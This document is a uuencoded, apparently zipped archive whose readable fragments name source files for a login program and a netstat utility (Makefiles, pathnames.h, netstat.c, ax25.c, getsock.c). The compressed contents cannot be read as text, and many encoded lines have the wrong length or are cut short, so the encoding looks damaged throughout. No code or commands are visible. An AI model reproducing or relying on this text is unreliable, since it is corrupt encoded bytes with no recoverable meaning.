M-##:)N3?7"JJ#G-I0T(T8CCEOR;2+K[@6RP2V(:>5OOSPL^_0*LF^.'4<0`.WI*8G'.)A@["_CMGXCK*_FWM.`P
MP(:D'1GS$5]_4>*DT<;YQ>/'-FX(`Z!][DI2\P>R`.4!UA>?;!I>R:HU]4FN
MJ""J`<8G72^'P!LW!,7N
MZ2LYF@PDW)>M_XC(2BOR?!+BG+7S&QTF-2)L%U-WWM835>[D!]N=4,3[[,A<
MC"IB+S=/]86VK#SZF[GB5KB.IG/R""G52Z2N+\,@($%MM#EQE,R/.*I+#Z$2
M!'78)X??E"Z8WVG#K\?*;QXL\_'%&^E83GXM)B_^3';NES2SL6/_E)7Q%/'#TKU2>+15"--"7\J;LI@-OIQ@4R4K_RJ5/DBN7OX6E-#*E.ABA
M"C"J'TI1\GXG20CK_DM
M?CE)FYC\>QU?=2LB-+A/KSE2FWVXYCE;%K)Z$D`J/&:!OL/,0A#'-`LFWA<5
M>2B_^0.OX5/,N`:P4GMQ1ST9P,]C2=^4MNH)AMR]R,?Q+T#I'^;@GQR!EKJC
M8OUI%@GQ)/=+4_TO4$L#!!0````(`+F=2QV\ZKM>,P0``#0)```.````;&]G
M:6XO36%K969I;&6E56UOVS80_FS^BFL38$D626O1`44V#W6&]?VS9^SLXK0+'1ZW.5,3)VU
M`>5R2-VZ)?'E**8)SBHEJGW0%E/VHFSQ2Y@[Z:S1P@0J2DT*F5U0^VTD*$&WS:-=2'VEJ]Y91>([_W"NLJO
MD8ZOKJ\^TEV-O0A>ZD:)6"8OHL`0I!9_6(,]ZJR.XA=7'Q_NOQW]?'S]X_N+
MJQ%A2%.J%KOO]]8&CNF7M2AO8[_$YLY+UG$=0G;Q$K))3A12$PP_/=_>Z9YW
M/SW'@TZ#>-`]XP$[.XH8".$A.U_5\FQR&&%5EVJ_?9'92HRGA%#+AMPB2O_J
MKY?0&B6\3QW_%?:V(=S?>^,6C2JJ!=M!F.C$4\7P'SH?N\WW[M'Q]%'%+[0>>>
MN$GMU@OG00L_[ZL=)SV%SI2A[EX9BG1M_8HE88,M6+E5XJ[`)+Y)3[BRO%6"
M#8)MRQI33?MOMVB#;GJOB\>OBON`.?R-S/_Y/HG3#MUBW\Z'[G\3>$B;M/H.
M-K7OGS(VZ1H6NLZ-!:&2X\]?M[NIK:3W+?[,V%#%8I")-MM#PV>:FX-X=R]_
MD6*@A3XO.NOK1];7;/!&(&\XQ^5"R\/7ME45N-9@B0-ZT';!3:QYVJIH:;G"
M/307GL6!/\`Q[@;_?C72M.&03Y`E9+:;J0Q%B9[6L<-YPZXYW-R#2@/3'(C]2:E
MMYSZ&^DO4$L#!!0````(`,6=2QTUFW%:O0$``+4#```1````;&]G:6XO<&%T
M:&YA;65S+FAUDL%NHS`0AL_P%)9S:7/`AU6E=D^%Q"U(%"H@A^X%.3`I5L%&
M!M+R]FL"*0G=M1`&S_?_8WN&K$VT-AYO5K@L+F"H1.,&MCQPNV
M7J2E^H\+."\@3*#-+O@IG+[:B9LZL4M]'^F!R9X+TA1X06P61':)[)(TL%]H
M[/VA`X'N%^(D>4/CP"2'(VG;?A;K8/+V2F/TC>B-#DC;US!C,=WL(GKI-&`-
M9)V"DY])UA-KC%FW]&F8C=FX:Q0I9<;*X0B_Q]>P-GQ86)?@/Q9I%(:)@:\%
M^'RU6G>MQZX?/7F!@J^B:HI3O7.`%]&)[OA9KUR-3I*FE+$G%>/F#"Y/M
MD^=38SQP)=M\B03AE.U$"#GE6Q3AS`S5N][1!'B!ER2V,]EPP=N6[9=0M)GB
M*OL1HLYP37/#*=A+V2ZQV`N>OX_3_AL[U=NX+/,(+\%=3*.Q+4:V:T"=
M&N(O4$L#!`H``````+$;/B(````````````````(````;F5TX0$!(*4`4$L#!!0````(`,)\
M4!W)ZQYI=P0``-<+```-````;F5TA[U7\FMA`;DHX3;G0M_J
M7,-H&*/8A>]_QT6Q:DH&G]167>CMAJGA'B9U-H\"@NH`AW*O=2"@7XA.*M:+,#;U(IK7@MD3#]?3[P^
M&<9`P>,1%B=+4M]'1F43\>FG$+XV*E^P($S9,]=!$J:OOF^0D<3C73*+>BW$
M,&U5L:*[19>B\$,6A^",'`EB%+V]%![)HK^-1)!5T*4J.BLV\+W"_UGD7)GW
MCS,R;N5VXH;W31NCF;/UA@W?,V7,`A=4+WZ>3L/S8`^[9:$^M4&VOS(PRJ$1
MF$Y1HJIEP+,XY9^N4CX8A+Z'O04`E!K2[B4AT!LR2X_'R!A`_'P5QW%J1-E*
M,>,)QN,,L'K>JP4YRH)#E'$9XGKI6""LU7]8:)KJ/@3`[F9V$(608W7ZZOL46-,ZAL@;&M=,FD1$$S?S["
MS[GX00,9P5K_(ZZ$O%5BK&'H(KBZ^AV,OGU?G+S"ZVXG9-5FJU6
M016>)Y?I3MHM6YW;R>^D4TF6EP%NC2BYC)*H"@_2BOHVKVU2:2SPF6G]-J(N
M)A>2B^@Z5QJ22YAO-5,@:@TO3-88FHOH34V;"YK#Q9(5#[@##[5P!L0=-4?\
M#Y9J"X?K#AW!C6>V8&G'N;*6\FQU:?Y)B?A*G4#2\W"<7O/RWF-`!DW\;E#T%XME0/]XK5G@9[*'(VQ/!"B6G
MA=:MD#D^3DH4!V:LKP:ELGV[AM'9,!0UDDO<@FE:JZLRWP8]>V+U\&3Z5I9L
MO](^`M*!N@*T\&Z-U($K\0]=H?8)3YWQAM94UP$F`\8P['[OVM]U'J^VQM/.
MA7HK2;@LF6ZD@!AW!)[`/FY1U"T
MEP`PEP!S/Q!FH%@1#[%7JP7.W_C$-#:N<13_QT%,9MSTL1%VQ:0(C6_/HFJ)
MIR6J()0":6RJ`H=$"!\RF/PV[0!8A<&@-=Q>-7IQ@L.VM4N,$R>6.;):(7=F
M$9OH0692YL@>XG%GI9N.&"UN7`.IA6*3V$%Y,S6FPZUZ[;+CDM,-1+*,--4U
MLZ5L;NO=[K(OZE'\
M[YW=2X*76J'@AV.Y9YZ9>9[9E[070P^FYU<[P^BJX`9R7C*@4EC"A0%;,+!2
M[93LGI6@B+8@\X`J+:VDLL3T*#).*8FQW`EJN<3$2F8."^52!W9H`#-B&&3<
M6,UGSO,2S/;];Y@V^'L8G7:VNB1/:#1(!KO18#?=?9\>["U88V<+J0^CB689
M3!.X)P(^L4HQT8>C!U+:7^S4^34195*YN6`VD7I^$B2>255K/B\L#`X.]N`S
MIUI^0RZ<28W:B9?3](F:0:#!N285^)EHQL#(W#X0S4902P<4>Z.,I1<&W(94
M(K(4/7O_/*\1!2^;H<)PN66+PGWP`CND$8QF
M-$CE<[M`1`TE09G+9+]!:;S%!2U=QN#(U":UM6(F*4[68"/I'0Z\C=NLY+._
M,"[;$--:K$'4=UE/U%S,VY@3N`-9"]O$PYMSY&T^PQ8'M`TJ8@M!*F]F,XYC
M]HC&181M'+5`,.#86=Y-"BP.]
M9C4_?L(Q_(X!WK74]=%:#A_&-^>WX\E'O'$-8Z4-XTS@J7R)]DS@2[3Q]^&^
MISU3N:(!3*\O+^,G+SOMP5G!Z!WX0[5\(2`G%2]KL&2V>A'\I0IHXL_7FLUX
MOA+3H071T/.[U(V]Y34JCD1A8T!`X5`6`QHA\%#XAZSC";!Q'#1V<6@1FNIL
M8!5:J4Z(=G=.?/D^A"9=O-76:=&$1G&$R_:V+_B$WR(6BHWBI[=V+()E+GS@
M#>TN;9(X&``"$$0``$@```&YE
M='-T870O;&EB+V%X,C4N8]57;6_;-A#^+/^*JX>D4N(XB;NV:YUD\Q*[-9JY
M09UV!=K"8"3*YBJ3`DDU\=K\]]V1LBV_=,.`?5F`P-+Q7I][HP[W:K`'@^[U
M02NXG@@#J<@XQ$I:)J0!)D%,\XQ/.1*L4!)4"G;"H=YYWVP]KJ-P$)@BSY6V
MD!8R)AY4HK3C=!'VY%EH'FB4+EZ.I4)04ZRPP8A9[A;Q_&RCK+
MF;AQ"IGS$-\TTS/DTY8GH`K;!'#ASD\6$1LUY5`8GA:9$V42^5/+)1$38$FB
MN3'$_\5[OPR[`0FSC*+U1I7Z7.1@;)&F#2`]4Z7Y',!,?.9S'#J%G2C]/.AA
M;#!HPA>$_16?YEPVX.269?8/_DM!OTV9-:?%6'+;5'I\YLRAIDJ($;;Z,8\
M6QR$G>-PB%DET$4Z0RH4,N%(H&`LUU-#D;FW%X.W\()+KIF'\*JXR40,<"EB
M+HU+&.1$,Q.,%VYF7@QZY`T,2W><:$^A%1="&X`+9$.+<^!;T'(>.L2+"<,9^I&#=<==7J=
M]ZW'\.V;?WWY.[TN94[,S!S:66&
M[U@,"/T
M:VK&'XY;/WUJXSF_0W,2>TD7L0664B!`F(W\/21K]_COJ$^J5+%0
M_,0IOCON+A3C:4IN/4"_(C`NQC3<=4H0H(Q+9S;ZU(#ZP4Y2;X!P4IK;0I=G
M[=H](H8E=2%,GK$9#7HWT<&7Z'S.-:G.M@#KK89E/DB&!&#/L+SA`)3%E&L1
M>Z#)7SPY.#-LE+*IR&8$R-%=#_^HO;:<17-WZQ\&KP==&':O/]6K853R&Z[[
M,:+*@+T(]4:DF.HD9EG67#Q%)0)E:*C%QR5D7MC01XI`83#;0O11;985N>=?
M%$[D!L2KY;0>9K6`FRPE9E3B,O^O`W(&,)\]H8U%KVF,T\KQ>\KO1-Q,E$;D
M)L==:@'(4S1)P;B=X$0A#AP*5&E5F!+N[4"$=E!37&Y'KBQCE'7S_&.B9[#CH$''R5VR(IJ
M@H24<8FK#M6X&8F>=_N#=YU+]#HH:_#`]?E]+:#D[^]3YE:*(L),QG!R@FWK
MFKC7=3$3--3X/F/GI?\(C(),R?'//C$$#0V?4X3V.[BO)L=AM16J#1.;6/TW
M4"V0:OW:?X&A5G%:1CQ0.>[JE"YS>!-SI3F_5MW,+#=XS[,3N,F8_&S**G75
MB'6"()^`$7]RE8:^>[Q@A"8H_+])!,[?]50L71KBS0,!O^4@.EE.\Z.M&PE%T#^\)!@VYM55]$6)Q`_LB>,I)[;%:\)RX]`;)6GP
M]O(RVO1DQZR7L_,8?"ZVL%,/.!%2O"YXO_T",OG^GOR_K<;)O]F-%%9EH9;L
M>(HUM@R@G`L;>[%RSVUOK9$AGW_E2?=E&8O+W`',?(T*RS)U6JX9">=4?
M#D>&VQ%)A;2;T\3?6(BP=-Y=X$,ZN^Z_/D>(+QJPZUA\!%^W],.J[ITD6E0,
M$1QJC7L:ZZC?%/!@-+_M76Y.U"LZ0P.GWNH/SSE4#?D2)#8&U8,J:F=PN
MK_#E\RF00VY!I`QF75=X(*KU&O,MR;02+L&OW
M[87US0^(?[#>^UO+9L5R:;@RGISIWXOC<5R-WC6O-^2?&8["GKM7C?H=3O=QYTG.Y5BOW"3S.P&AT;&-&S3
M-T#[0TYSJ4/:/Q>I^R*?%?S;UFE[6HP!K9V9\8&']SS+9T:-)XYZ3Y[LT"L5
MF>P#=.EY9H#;1U;Z"4H6SK*`(O@%C'HXDY;RI
MT'$'8=,TBU4R@Y0*'4L(F`@GS=0R?7YU-'Q'1U)+(U)O^KH8I2HB.E&1U.!*
M6**<97:">&DT*\WHD-'0VPJ.-SW,X,6'L$=VGVEH[2(D7)41:+&[4F]!F%"Q_WW@[/C#X/3
MX\&;:ZU].[,=-\NE;4\.UL0VB[XB+2OR5.GBHJ.2LS+YM^\)DZ^=YN)4C6[(
M5+8JDL;H-5'$V-8-C=+C55FAD=UX15:OBIP)N!;FPDVTF'*XX*4F+T"@)AQ9
M1(XFY^R-?&AGY6(/2IT->J%LGHH9-]B\DTC$L9'6DN+J$K$8H1/11E/AVIP(
MRQT84301!J6:FY*Q9J&M0K7'U4;N3*OVO4:TK#XJDN3CKX\^PSDVF,GCZE[L4A'KJ\I%OV6G.(]8_#/X<#>CLX_5Q?AKY(S-P8O2E:U\&\U'GA
M;LT[Q@=/7G2?(Y?12&EA9LN1(6TUI:OCRS!!5![2W1'>K`Z&ZA=12!L9IB(+
M<#*I$$,U+4MD+>Z5"FZ798SYY`RVEL/TQ@K"+N_SX?C/$'EY/L'5TFQZR'3O
M*34^=1LM>OB0FHKV"6/DK'\R&+9:]+T6`$AY2A#AUYML;F+%"5,V5F/EFA%4
M2[V(MJC1;6`?`S#%]&2UB`[@0S380T3[^)\T5@RPM4F][FU6_26KPU6K_KK5
M=QZ&L4SHQ>#W=T>U($BJ_L+\P/Q!ARU2]L"V=D$U3E-Q2>D\]_<^Z7KH"4.A
MW)<:]P=.\N,+C@]K+",2P:NPU?S64R6+*H\IM,_(@*9X3"A3@FL#+6&3QZ'MBR
M?#PAUWSPLT<(`B`G;,?PF(9@42-7Z,HK;EEHG4Z$:^#NP5U#?7P)+-Q]*?37
MW]BX')?K<7#_KK;TS=A^-C)VM9+$:;_[Z'E/PBM\"6
M`+)XO.?XW-USU*@?4Y\R64;1&RJ-7ABQHKDVE`N5%5(ML">*JB3%;JW-DE*M
M%*=2*YL`&45_YM+N@`'$EES.C:/SG@!SQEF(6X<+T&U('+.T0_PLF:8WUW=#
MNKN[(_A^N)Y.$Z)K1ZE03?"`G&F7DU2I7GF&L).NW$+[Q<&Q0ZJL-Y7"6AR4
M!:CEM#+2;0*978@#E$\K>+YGQ484),RB6K%RB&,LFV:?_F)CX?\R>MU]UENP
M@YM-TN@\&2>GT?A\-/YE=''>^+ZI7*[-2PI_[PQ*<9O0(W+ZP*N2U9`NUZ)P
M?_/KRO\FJDA6U0+E2;19O`IDWNIR8^0B=W1Z)T;9K)Z[M;"\(0VN@I%!1=IG9&SRC%)%Z"HYPC%H97.Y'P#*U4J
M8QA\6QV;E24]KU?O;S]24Z<`O:MFA4R);F3*RC()2U1ZF\V1-,TV-BX72=[9VR[MQH[MK$Q
M2A_!Y4*)XLCF,GGLYC!ILV.;@2[;MDJA55G+UK%5B_#6FVNR@YL^GX[/SA\G6U+?ED/JE,]Z"J"2'?J#2G<-:*#>)L1I!
MMX19\4H/3`\Y"II5\SF&C^@3TTIL!][@C"DY:;KTQHVN[V)'V'L(26X^2UX
M'M"_T7I97W1UJ)
MH)U+M*SK2TL_7=')_?B$GC\']TMZ<=:CKW&$ME\OE#9,!8O,
MUP(8Q[84*@P$:YL-/>:>D$I>O\_WQ
MYIS6Y?%CNB]1C4.)]H=WC@X_.0E9(0H>/]`)OE%>*`A[
MD.;O?P07Q?^X&K4[,J'K^D;962!%2VQ347*&=B]EZ2_$@,(&Q@?TO(O289(,
M)V$3O",O8J39;XH3U95L-:5DB:)[S@'#('8C\B`R];F
MXVSEXDOJC)!%6XQ'S6\5[(#4?R@2AQ(]A=GT%PR.EI/]G&SG@K[39G._]6X_
MWMQX@&%7&=7U,7J3^"G^%U!+`P04````"`#P>E`=9_]DZ00#``#D!0``%0``
M`&YE='-T870O;&EB+V=E='-O8VLN8XU46T_;,!A]3G[%IR)HTI2DA4D,>A$,
MK6C:AB:-71Z0D)LXC4=J6[Z`LHW_OL]."VMATA[:Q,?GNQV?..N%T(/+MU?[
M!\%5Q324K*:0"VX(XQHD409$"::BH*V4`I>EY;EA`G>7HK`UQ01!4`KE23X3
MS(FF4#!M%)M;QTV1Y'DS:O(*"&B1WU*S3XI"48U5E5@BFDDE`H.SY<4<^LJ80Z"6:*%G"9PAWA\)XN
M)>5]&-^3VOR@I]8]4UZG2[O@U*1"+::^M7,A&\46E8'A\?$A?&2Y$M^0"^="
MX>#$S;$>PTN%S2X468)335$42)3FGB@Z@D98R+$VMK$6@0(S/I3P(D.QG'BL
M;!`%RPN*@)//4+743G"_NKC\`A>44T5J'_K)SFN6`WQ@.>6H,-$`TF&ZPGEA
MWK1A,'/=P.=5.ZWN`JOX$48`E"$-*]ZURL+!^HA7B?O@&HQ(VS`.HT!(%QL#
MX0W4!-MW=1$^@)*;B9.D&
MPD'#O"(*G;$R9]0NY[:4?<#R-C?>[\[LT--$QN&O$/#8-4,'%M#2I5$C1-N%
MEC`!E\!!C!M@?31S[59;"6\8=SG9)'II(\9JHQ"C,#MFC+9JQN#WL409:8V.
M+2/?=6>W_M[I[V':_:EF_,;E2[5_Q)/),,8(-T'P2"C)DM7-Y&QV\PYO`);=/V0&+\W_>V!WIW,V-+_($T]_1Y/Y[G
M;4NS%D(-!KWKG79P'7,#8YXPH%)8PH4!&S.P4NTD;,824$1;D&./QD1'!2962N#=.!;5<8N!41BDF&DOMV;X`C(AA$'%C-1^ECM?`:%?_EFF#GX?!
M266K&L\;-&@U6KM!:[>Y^ZEYL+=DG:8VEOHP.-"V8;4DV/?XIE4"\TGL876P<$>?.54RSODPIG4V#MQ[61U
M@LP(I>5$DRDX3S1C8.38.L$=6,@4*-;&-E9:&'#K0XF(FJC9Z>?C!:*0BH@A
MX)UD>FJ<@?[K8G`#%TPP31(?.DQ'":<`?4Z90*.(`5`.,S'JA=$B"X-SUPU<
M+=OQH><2JW@)'0#&D8859YFIT%Z-;)FX#J[!"LD:1C$:I'*Q52!B`0G!-E?!
M;D#-<(L+FJ01@R.S,$V[4,PTXN,2;"1]0,.+N(T2/OH#X[((,:U%":*N2CE0
MF&\33$)5W]/0M=3'./C/V19PR$1P7'/V)J6F3M%:SCD
ML;U?*@90H`#``S>FG*=("I3*&6@LGF1:2E/+5O/C)W3A*0P!/N1LKX+/=5N%HU/,-]*XO>]\<
M)>_A2VB.>/J]O>^KO/KX%FTX]'I>75J1`!`?W/3[X3,:%S9K
M:/#^63)Z>8[Q1?.WRUWMDLOAA-EEC0K%#%!S%Z0:/H7EN=9P(JKC!H$KSF0Y
MGPX"\]C]AU0<`3:ZOK\JSBS`?BL;F(5.5<7O5G>.7?HZ^")5?%!MJD6VU0D#
M7+:W7<)G_"WW?+).^/R>:H67RX7UQ'<4NQ+IP8``*P0```2````;F5T:LW4^)V5K_O>]=W<&
MFY!,E98@P._+O<_[?O0Z+>C`='QU<.1<);R`F*<,PDRH@(L"`@%\F:=LR9"@
M>"8@BT$E#-KO4*>-NHY3E'F>205Q*4(2P3,RJ87TL3`/"@81+Y3D\Y($NJA&
M5C\R6>#C*^>-^\3C@JENZ!QVC_K.X5$/7R^?6;E1J9),OG(FDD4P[<(-HGK/
MECD3/KR^#5+U%WM3TF=7I-UEN:"3,KDXUNC>9OE*\D6BX/#ERV?P.P]E]@EE
MX6TF$;9VRMAQ3`!RF2UDL`2*A60,BBQ6MX%D`UAE)81H&V%4WC#@2JL&(NJA
MU[#,(AZOD`JEB!@2*`Z*R65!D=-/I]-K.&6"R2#5JN?E/.4AP`<>,H&A"@J`
MG&A%@O["?&748$)HX-+"T:J3#*UH%P8`C*,86KPQ886C*E?V8!\(H!L8P.B,
MA"PG70_3O((T0)B5,J6HUWK"19B6$68;"R+FBV[2;B$QAM]&'\>ST81J8"/T
MNE@5/;7*6=%-CK?(119^Q:PTZ(',@YY.^WVR"):L8++)05$21YTF/22C31*3
M4F3WM*-YDR19D:4W6VA5E/+Y-DURL;@GQ[AW-.%#9`9V'M1TF#(_I;?2Y4"VM9D+%7`(`
MVKR_`R=T"BZ\5LV))"L4S@[H)'D-+^9"$P42D8I`3N4RC[MP,+EY3Y6'DEP<
M'./;+`Z6/%TAZ-%D1E`&=:8>/$/H5\>8N@RJ#`'N;4EH@07P%\%=FMH(#<9O)K
M#9LKI30QU`G*A,I'GEP+&:HA'@=\CU?6=\M
MAPSL<`M;'F,#)^-?KT^10L70-:.C@.]#N!A?SC2/Q)&'A<"5B\I/F,!IV*H\
M2JQ'5!--EX8;E]8%L_%)-S,Y,=/?-@`/*H0X=]F2O+'UZ<%^(Q`^K!D)>IIH
MX@PGK/K<_^);6LK$0B6>+=--;`S7QH8ZV
MP;<'^@::S9T+(I6BX+C_(D@SK/@@\O5)Z.Z#?4:9V>ZUO76S4?P;V7?B'&>A
MBC%=N-XPL.W*X5=DW%X%"!(K<(&:\YY&L/>G:/LMQ_QMV=M4RCK5X]%D>G9Y
M?7Y^=G&U(]_X%D0HYC;\]6!7]0^LDZ10;U]=6J;33`)@'_K??IE,)KH>^YJO
M!>K\%_T^MIS&04
M(6$%&Q+1CH_AA;?FU.0M\_#GQ[A'S]=,[+KX.:8$).,[9DTQ!2:&#=B10K5'*H#(YS:K!;0B\Y6@JUP
M9`F5)2EZJ?W0\]/@QIP(57OZCZP#F+JH#K;!(M^0KR&;\]:SC#RJS1[JN^?^
MNH<&MHY(J8H/I:7A-S)K8Z9>*XU%H"U98/F>GIW97^U1I
M[^_KTZIGLUL>+]H?K-E'2_:QBC60=2VXC1'H+8,TS4(<9W^S+*[SC%I5BZA(
MT[+2^
M9^$,S*2UJQ";60R)(6N"T:7K#B_R-%C1S[1W`J_O6")@KMK5"-8W"FO%'&GL
MZ%1NQJ=AY4H:8Q8EW;9GV%2!ZW:J<-HVII"0N/=_@#&%Y6YM24Q2D.]O%E4-TR4`=70+"^-@YUW4PF\/T[[.!YE:_MS].SZ1@NQU=?VEXU
M))H;G8SYL`U3+W,/--8*IQD5U;JS%G0CU6X0=-P#EP@N\E+9$D"Q_-X-0L>F
MD:O&+=WH/(S46]LU+1+3+RC0Z;;?AWH.MHG4]IWVR>CB?+1.*U+LY/$=VVS-
M1>Q7I:\3ZSNU+/N.LW'1UGYE4.?\"4$L#!!0````(`'!C
M4!UW`,N"_[[I)!>T^
M*D6VC^_Q/?=N2FYAXCOJ%:R.4W/..PK6H4*J'A+7\XY566LQS2T&
MN[O;^"@2K;Y2+(Z5+I5FEE0T>;RFDE*KJ68SN*(TYS`JLT[_$+6JD%!NDB&,
MU6)260YAYU0FTY[2P$RE(JL)12533H"SPG(],U!9LWH_OL#[QIPY]7,U*40"
MC$3"I>%@!B@=9G*J%Y.ZH>'4J<%9*V=./56495["$.""PBCC;6,MMEQ&QVP/
M[L()#%DCF(K14*7C1F"R1L%(YH+LVM3SUX1,BBKE"*BSF9C&>>`_@?NF-KVF
MJ?GA"FQ4Q2E);TF6L$++ZV1/9
M$AJ8JJ3>6U?/$U@RFTLV<^50F7YO`^^$*0M6DSVX&)]]/CD&2U/-C8F=.\:2
M\PD2NN!T?TI]74E3\B2D0=`=3-N=TNK(O_>!Y_&3*LLNW[RZ&A+>ABGC%D):
MB*%/,P)P,`]T>*9T*&C='T)@'T;\XBH+R84JL7!N.V41;78Z$>Y]S[$[!S`E
MV62SD)9=!"_Z6]\V@RY")ZK3P4OTMW=VHL@E>*1OKHK.++@,W3S")@97E'7]
M>W_=!6EN*]WN#?W'?[G4=/__9IG6K942L&%8V?@E,H2TV#PT[#IC,U'4."`#
M?I[2#P\/^,M>M%`87(X_C4]P=G)^%43/E#]U:<&FOP^+VF):+?F=NV]H`J_;
MU0&RQ>E=[ZE"VAQ?C$;MX#\.5]*XQV\EB8-J("T````)@$`
M`!0```!N971S=&%T+VQI8B]-86ME9FEL956.,0O",!2$Y^179'"P!2,(+@6'
M.D@51%#0^36D;6A,0I)B?[[/MD@[W?&]N^,5K]OQ\B`'UGRX9=I:5X)HT0:M
M'(J,C?2HT._V*,XAI/EI*D&%K#.J1U%&QG^0/O/[.<=$+6.PPR`Z\'7`&YW:
MJ_602M",BS]7#`\EE&I5ALXYZR.'C%RAE972DG&^%=94JN8-ILDLN`J`?>3FQQLHS4:!R6:``8&S)D5Q(^B0EIGY+QQ
M$E5*B$_Z)(RES^/HK+O7L[74*8\&Z:`?#?I9_WLV/-K$C1M7H3F.+HTH8)K"
M"U/P2RRU4`FK6R$7E8#`<'L&MY`:?
M*1;.T9!AY@VM=:+H%@M92A*9MS"N2>4<7Q.X92T,OX%#JOI%F%#9T04/[7/"
M+"U@N?ZZFC["E5#"L#I0\V9>2PXPD5PH*X!9`.TQ6Y%[;S_0X-*[@?N-G4"]
M1%()58\`A*0P4GQ93P(.O:)G;A(GX`UVV=HP%6,`M>?V@*D6:D8V/\A^JEF\
M)Q6OFT)`AU:DE(NTZL0$EG`]?KJ873_G>1Y_!IW8UF:NU<*FU>D.+)&[^BML
MD?^C^6[AM53-:R;+G6A7U'+^!9.X#7&OOPT)8]1.5,G5%SH:W&V#_>.T9GR$Z'&@5"<:=O487Q`/_]'
M.(^%L-Q([="D?@K640@'J5Q_!9'I2;?KNR2)RHTZ?Q>[ZA"
M!S;(>:D5;0:E_USN](_J]$;Q>^PO*KWA#JJ5[QU0_MGF]0>\Q4"%:-U)HDZ.
M)'00[I`;=,BQ)CP:W^77=S]GI)-$_80(T\?)A/#MQ]IY_#XBP3VAZ)!$U)&P
M1]XAE?D?4$L#!!0````(`'!C4!U1NK5:M@,``,X+```2````;F5T68<-ZT#'PY@=#YM'GK3)=<0
M\X0!E<(0+C28)8/)\&H,.DM3J0S$4CG19<"<:(;YGA=Q;12?9X9+$:)B-[UA
M2N//$^]]_4U#)SP-J=<).VVOTVZU?VL='^5Q_D<2\P][G]G/4"3A*EL(9D*I%N^<\4"F:\472P.=X^,CN.94R2\8"P.I
ML&!B"]KX>-ZUC'C,T62^AGZ"+@/Y-8!KLH;C7\%(I+YERI$=%2FN):F2"T56
M8+NC&`,M8W-'%.O!6F9`<2.LO&@``VY<*A%1"YL%*^NZ1A4R$>'^KGV&J94&
M&6]^?1A]A@],,$42ESK.Y@FG`$-.F=`,B`9(K::76+TMWZ7!A:T&)GDY+O5"
MHHNC[@$PCF'H>+N9!!Q:1YN9;QR`+;!.-@4CC`*9VMP&$+&&A&"91;*=:LM_
MPP5-LHA!#8](S!?ALN:C&,-E_^9\=OG%GA7_(>I4KW7+K%.FP^6[BLPE-;']>1!38I:"K&PWL&U^ZP`FS+B!("$#/$.4I^XKSHFX0\(%
M2=QJ:-NO#8Z6`A?&MYV>:69F-JN."L118%?<-@W_FP^`G"&KB.D)@9P*HE?=^&S5.X*W^6]0"MW<`V!D,E*KN
M&MEH]'Q/,9,I46]NE!Z:W^-?KK91N"\#,T%)JK/$'56P(_H19I==@G;*-NJ)
MI;ZZ.!\-^N,@#]N#?./P&-TI+V,W1)F'*[7<`ML%7''7;\0T53PU4E4[$,F9
MO4ES]`?>\L0L]VAFM1RUJ+#CJBLE;$!M1GMK\',8-Q^;+R&AKX;2^6$4NTFS
M^Y*9=%^%Y/!GA_+S,/3U:([VH/D.0R*"_XQNJW?%WAQ%_JN0_+[/7/"NR*B!
MY9V[WVQ;9_GW/\`64[-2+?!J$Z8XWGE#>_5?C5'Q^I_&EY_.7%F!UPXP>/1Y
M.,2%\D=^]OS[7L6,;G&CA=W-1]CI.-C#DF[W=.=F"V'7>G:;A:TNP=I
M=P=JU9=^-T;8'=Z/B?_/F^XP+PY9Q;Z0;0']XASO*J!_UA]/@V?MB_UL`?A^
MQ02^4WKXI#QZ[;(/P']02P,$%`````@`HV10'2+Z&]2!`@``W`4``!4```!N
M971S=&%T+VQI8B]S=7!P;W)T+FBU5$UOVS`,/3N_@L`NB9$YS7H8V@Q#AV+M
M86LQ8%_'0;'I6)LL&924S!CZWT?*3KJB:(8==@HEO?=(/C)>Y!/(P<>NVTW^TJ@=54TZ.>@;)4JJ*,M)3]T
MY()[GJBA[]`7'$H/7Y`\OY]G%]-GL_N&EL7R)%N>+$Y>+LY.1^B;&!I'Y]D5
M806W!6R5A7?8=FCG\&JG3/B.%U%^"VN*-FXLAL+1YG5*>NFZGO2F";`\.SN%
M&UV2^\I8N'3$.944.>3)!C>YX`VI5ORJ"1&\J\-.$:Z@=Q%*SLUE:'9%KV-`
M=BI1N>\%.R-&Z+H7_Z*MD"_$C(#4ID&DT_7M9[A&BZ1,HGZ(:Z-+@/>Z1.L1
ME`?HY,XWW"^L^X$&5U(-?!S+2=0KQUE2"RL`U`SCC-O!67@A&84Y"L]!"IRJ
MH6!NAL!UPIWQU'HPBLO]9OD&P[/5K&*&G[^.IXU@"@Y8HFYM,"B35UFOSO_=.4A+;Z5;L
MVPP8$A_O>.^].TF]W1"[F(RN]O:#JX5RR%0ND1CMA=(.?B$QEUI:D6,A;/I1
M6`F_*J3K4AZGOI/6*:.?!R]:.W&IU:=N$@RZ@WXPZ/?ZA[VC@R;NK/0+8Y\'
M8RM33+KX(#3>R&4A=0?''T7N_Y0O2KYV==Y=EG,M?=?8^2GE!L&Y*596S1<>
M@Z.C`_RJ$FM^IUB<&UL8*SPQJ.L$M8K"FKD52[`@*R63:[QJC:F2GU;SG*5
M`!&JE02AH!4%$85/]2V8I\K
MW=#%Z1;L3/(7=:'",_QR]FXT/1M?3U[?A#L`-D)+785)3<:MG^+37,VV3O:I
M,IN0M%9O00ESVDZT2L\W,1HX.F\#BUQ9T$QXUOD(%L(OM%BR3)(?]G;Q4KDB
M%RNR#=>3R[>C__S3[=#PILPXWA!!T`-0[HC`"=5(..9L2U%Z_X0"L=PZF]ILA9)
M+A,/;@23BVFSW8[Q.0PXNWT"5U'*6K3L(/JAOW^S%W708E+M-GY$_^#P,(ZY
MP!W]*U9T9BYUB^]C[&%P2U6?_=%_QD%6^M(V>\/P[I^,J@?C^W[5[+958->)
MHE,YHN;[\Q&0X?73WW]+V7^
M#Y8^J/V6H0TSD?$##/X@3)O[$S"EB*&H$T25Z)>5:%H&9^,I(YV@WZ&HQR*=
M8$TWQ4VN+RZ:2W@W;%XY`=FYUD7V[BD35\CD"1<&:S8\*`]$>/%`Y7&$F,S:
M9#^E\Q502P,$%`````@`**E1'14T;>/^````C0$``!````!N971S=&%T+TUA
M:V5F:6QE79!?2\,P%,6?W:'(I?^^-(V!PS"
M+<5Z!SOXP[56AI5R.S09%#Z3K/!GEMO\ZGUTW`,"NV(XCMA[ZH:27
MLFTCQBIGC\V[_,#ONNL;9ZD+PI'ET%@B/44%&)NNM&(VP>6AL0!56YQ_XM^S?UL>4-[
M'N.UXA<[Z2(VMQ6Q09BFG+#?G^4H,F/6JM@H;0R*"H-;^`%02P,$%`````@`
M`JA1'=DI'P]R&```C60``!$```!N971S=&%T+VYE='-T870N8^P\:W<:QY*?
